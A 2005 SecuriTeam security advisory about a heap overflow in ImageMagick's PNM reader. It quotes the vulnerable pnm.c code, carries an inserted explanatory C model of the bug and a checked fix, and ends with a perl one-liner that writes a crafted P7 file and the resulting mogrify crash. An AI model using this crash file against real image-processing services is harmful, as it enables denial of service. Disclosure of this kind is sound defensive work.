[UNIX] ImageMagick ReadPNMImage() Heap Overflow

From: SecuriTeam (support_at_securiteam.com)
Date: 04/27/05

    To: list@securiteam.com
    Date: 27 Apr 2005 17:52:35 +0200

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
    - - promotion

    The SecuriTeam alerts list - Free, Accurate, Independent.

    Get your security news from a reliable source.
    http://www.securiteam.com/mailinglist.html

    - - - - - - - - -

      ImageMagick ReadPNMImage() Heap Overflow
    ------------------------------------------------------------------------

    SUMMARY

     <http://www.imagemagick.org> ImageMagick is "a free software suite to
    create, edit, and compose bitmap images. It can read, convert and write
    images in a large variety of formats".

    Remote exploitation of a heap overflow vulnerability in ImageMagick's
    ReadPNMImage() function allows execution of arbitrary code or denial of
    service.

    DETAILS

    Vulnerable Systems:
     * ImageMagick versions 6.x up to and including 6.2.1.

    Immune Systems:
     * ImageMagick version 6.2.2.

    Heap Overflow Vulnerability:
    A heap overflow exists in the ReadPNMImage() function, which is used to
    decode PNM image files.
    The vulnerable code in pnm.c:

    static Image *ReadPNMImage(const ImageInfo *image_info,
      ExceptionInfo *exception)
    {
    ..
        if ((format == '1') || (format == '4'))
          max_value=1; /* bitmap */
        else
          max_value=PNMInteger(image,10);
        image->depth=max_value < 256 ? 8UL : QuantumDepth;
        if ((format != '3') && (format != '6'))
          {
            image->storage_class=PseudoClass;
            image->colors=(unsigned long) (max_value >= MaxColormapSize ?
              MaxColormapSize : max_value+1);
          }
    ..
            if (AllocateImageColormap(image,image->colors) == MagickFalse)
              ThrowReaderException(ResourceLimitError,"MemoryAllocationFailed");
            if (format == '7')
              {
                /*
                  Initialize 332 colormap.
                */
                i=0;
                for (pixel.red=0; pixel.red < 8; pixel.red++)
                  for (pixel.green=0; pixel.green < 8; pixel.green++)
                    for (pixel.blue=0; pixel.blue < 4; pixel.blue++)
                    {
                      image->colormap[i].red=ScaleXToQuantum(pixel.red,0x07);
                      image->colormap[i].green=ScaleXToQuantum(pixel.green,0x07);
                      image->colormap[i].blue=ScaleXToQuantum(pixel.blue,0x03);
                      i++;
                    }
              }

    It is possible to manipulate the image->colors value, because it is
    derived from "max_value" (read from the file) or capped at
    MaxColormapSize. The memory for image->colormap is allocated according
    to image->colors (in the AllocateImageColormap() function).
    If the value of "image->colors" is, for example, 1, only
    1*sizeof(PixelPacket) bytes of memory are allocated. Next, when the PNM
    format is "7", the image->colormap buffer is initialized with the 332
    colormap, which the nested loops above fill with 8*8*4 = 256 entries
    regardless of image->colors. If image->colors*sizeof(PixelPacket) bytes
    are not enough for that, heap structures beyond the buffer are
    overwritten. The values written are fixed colormap entries that cannot be
    controlled, so execution of arbitrary code is very difficult or
    impossible, but causing a crash is easy.
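    To make the sizing mismatch concrete, here is an added C illustration (it is not ImageMagick's code and not the fix shipped in 6.2.2). It models the image->colors computation quoted above, measures how many bytes the unconditional 332 initialization would write past a colormap of a given size, and shows a bounds-checked variant that refuses to fill a table smaller than the 256 entries the loop produces. The PixelPacket layout, the MaxColormapSize value, the ScaleXToQuantum arithmetic and the reading of max_value = 1 from the crafted file are assumptions.

```c
#include <stdio.h>
#include <stdlib.h>

/* Added illustration, not ImageMagick's code. The constants and the
   PixelPacket layout below are assumptions chosen to mirror the advisory. */
#define MAX_COLORMAP_SIZE 65536UL              /* assumed value of MaxColormapSize */
#define COLORMAP_332_ENTRIES (8UL * 8UL * 4UL) /* entries written by the 332 loop: 256 */

typedef struct {                               /* assumed 16-bit quantum layout */
    unsigned short red, green, blue, opacity;
} PixelPacket;

/* Mirrors the quoted sizing: for every format except '3' and '6' the colormap
   length comes from the file's max_value (clamped). Formats '1' and '4' are
   bitmaps, so max_value is forced to 1. Returns 0 for DirectClass formats,
   which allocate no colormap. */
unsigned long vulnerable_colors(char format, unsigned long max_value)
{
    if (format == '3' || format == '6')
        return 0;
    if (format == '1' || format == '4')
        max_value = 1;
    return max_value >= MAX_COLORMAP_SIZE ? MAX_COLORMAP_SIZE : max_value + 1;
}

/* Hardened sizing (an assumed mitigation, not necessarily the 6.2.2 fix):
   a format-'7' image always gets at least the 256 entries the loop fills. */
unsigned long hardened_colors(char format, unsigned long max_value)
{
    unsigned long colors = vulnerable_colors(format, max_value);
    if (format == '7' && colors < COLORMAP_332_ENTRIES)
        colors = COLORMAP_332_ENTRIES;
    return colors;
}

/* Bytes the unconditional 332 loop would write past a colormap of `colors`
   entries; 0 when the table is large enough. */
unsigned long overflow_bytes(unsigned long colors)
{
    if (colors >= COLORMAP_332_ENTRIES)
        return 0;
    return (COLORMAP_332_ENTRIES - colors) * sizeof(PixelPacket);
}

/* Bounds-checked 332 initialisation: writes nothing and returns -1 if the
   table cannot hold all 256 entries, otherwise returns the count written.
   ScaleXToQuantum(x, max) is modelled as x * 65535 / max (assumption). */
long init_332_colormap(PixelPacket *colormap, unsigned long colors)
{
    if (colormap == NULL || colors < COLORMAP_332_ENTRIES)
        return -1;
    unsigned long i = 0;
    for (unsigned r = 0; r < 8; r++)
        for (unsigned g = 0; g < 8; g++)
            for (unsigned b = 0; b < 4; b++) {
                colormap[i].red     = (unsigned short)(r * 65535UL / 7);
                colormap[i].green   = (unsigned short)(g * 65535UL / 7);
                colormap[i].blue    = (unsigned short)(b * 65535UL / 3);
                colormap[i].opacity = 0;
                i++;
            }
    return (long)i;
}

/* Allocate a table of `colors` entries (as AllocateImageColormap would),
   run the checked initialisation and return its result. */
long init_table_of(unsigned long colors)
{
    PixelPacket *table = calloc(colors ? colors : 1, sizeof(PixelPacket));
    if (table == NULL)
        return -2;
    long written = init_332_colormap(table, colors);
    free(table);
    return written;
}

/* Verify the first, second and last entries of a filled table: 1 on success. */
int check_332_table(void)
{
    PixelPacket *table = calloc(COLORMAP_332_ENTRIES, sizeof(PixelPacket));
    if (table == NULL || init_332_colormap(table, COLORMAP_332_ENTRIES) != 256) {
        free(table);
        return 0;
    }
    int ok = table[0].red == 0 && table[0].green == 0 && table[0].blue == 0 &&
             table[1].blue == 21845 &&            /* b = 1 -> 65535 / 3 */
             table[255].red == 65535 && table[255].green == 65535 &&
             table[255].blue == 65535;
    free(table);
    return ok;
}

int main(void)
{
    /* Assumed: the crafted file "P7\n1\n1 1\n1" declares max_value = 1. */
    unsigned long colors = vulnerable_colors('7', 1);
    printf("vulnerable sizing: %lu entries, 332 init overruns by %lu bytes\n",
           colors, overflow_bytes(colors));
    printf("checked init on that table: %ld (refused)\n", init_table_of(colors));
    colors = hardened_colors('7', 1);
    printf("hardened sizing: %lu entries, init wrote %ld entries\n",
           colors, init_table_of(colors));
    return 0;
}
```

    The point the numbers make: with max_value = 1 the vulnerable sizing allocates 2 entries while the loop writes 256, so the overrun is 254*sizeof(PixelPacket) bytes of fixed colormap data landing on adjacent heap metadata, which is exactly what glibc's "memory corruption" abort in the proof of concept reports. Either sizing the table by the format's real need or checking the bound before the loop removes the overrun.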

    Proof of Concept:
    Example of crafted PNM file:
    bash$ perl -e 'print "P7\n1\n1 1\n1"' > vuln.pnm

    Test vulnerability with "mogrify" - standard ImageMagick utility:
    bash$ mogrify vuln.pnm
    *** glibc detected *** malloc(): memory corruption: 0x08701198 ***
    Przerwane (core dumped)
    bash$

    ADDITIONAL INFORMATION

    The information has been provided by Damian Put <mailto:pucik@overflow.pl>.
    The original article can be found at:
    http://www.overflow.pl/adv/imheapoverflow.txt

    ========================================

    This bulletin is sent to members of the SecuriTeam mailing list.
    To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
    In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

    ====================
    ====================

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

